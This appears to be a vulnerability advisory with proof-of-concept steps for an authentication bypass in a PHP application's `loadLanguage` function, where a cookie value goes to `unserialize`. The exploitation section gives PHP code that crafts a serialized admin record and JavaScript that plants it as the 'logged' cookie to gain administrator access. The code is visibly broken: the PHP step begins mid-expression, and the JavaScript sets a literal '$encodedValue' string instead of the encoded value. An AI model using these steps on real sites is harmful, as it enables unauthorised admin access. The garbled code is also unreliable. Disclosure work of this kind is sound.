### Key Information #### Vulnerability Type - **Authentication Bypass via Insecure Deserialization (Critical)** #### Vulnerability Description - In the `loadLanguage` function of the `class.main.php` file, there is an insecure deserialization issue. The function deserializes an arbitrary object and extracts its contents into variables (such as `$user_id`). #### Code Snippet ```php private function loadLanguage() { $lang_abbr = $this->getPreferredLanguage(); $abbr = $default_lang_abbr = 'en'; if (isset($_SESSION['logged']) || isset($_COOKIE['logged'])) { $user_id = $_SESSION['logged']['id'] ? $_SESSION['logged']['id'] : unserialize($_COOKIE['logged']['id']); // insecure deserialization $lang_abbr = $this->getUserLanguage($user_id); } if (isset($lang_abbr) && $lang_abbr !== null) { $abbr = $lang_abbr; $this->user_lang = $lang_abbr; } } ``` #### Exploitation Method 1. **Create a Malicious Serialized Array** ```php 1, 'username' => 'admin', ); $serialized = serialize($arr); echo "[*] Printing result: \n$serialized\n"; $unserialized = unserialize($serialized)['id']; echo "[*] Confirming id value: $unserialized"; ``` 2. **Set New Cookie Value** ```javascript // The raw cookie value const cookieValue = 'a:2:{s:2:"id";i:1;s:8:"username";s:5:"admin";}'; // URL encode the value to safely set in cookie const encodedValue = encodeURIComponent(cookieValue); // Set the cookie (session cookie, path=/) document.cookie = "logged=$encodedValue; path=/"; // Verify the cookie console.log(document.cookie); ``` #### Impact - By exploiting this vulnerability, an attacker can bypass the authentication mechanism and authenticate as an administrator.